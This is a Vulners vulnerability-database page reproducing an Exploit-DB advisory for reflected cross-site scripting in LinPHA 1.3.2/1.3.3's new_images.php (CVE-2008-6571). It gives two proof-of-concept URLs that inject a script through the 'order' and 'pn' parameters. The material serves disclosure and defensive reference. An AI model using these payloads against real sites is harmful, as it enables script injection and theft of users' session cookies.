Vulners
Lucene search
LinPHA 1.3.2/1.3.3 new_images.php XSS
🗓️ 09 Apr 2009 00:00:00Reported by Gerendi Sandor AttilaType 
exploitdb🔗 www.exploit-db.com👁 21 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2008-6571 | 31 Mar 200917:00 | – | cve |
 | CVE-2008-6571 | 31 Mar 200917:00 | – | cvelist |
| LinPHA 1.3.2/1.3.3 login.php XSS | 9 Apr 200900:00 | – | exploitdb |
 | EUVD-2008-6534 | 7 Oct 202500:30 | – | euvd |
 | CVE-2008-6571 | 31 Mar 200917:30 | – | nvd |
 | Cross site scripting | 31 Mar 200917:30 | – | prion |
 | CVE-2008-6571 | 9 Jan 202610:25 | – | redhatcve |
source: http://www.securityfocus.com/bid/34500/info
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
Versions prior to LinPHA 1.3.4 are vulnerable.
http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3EData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2009 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24.3
EPSS0.00357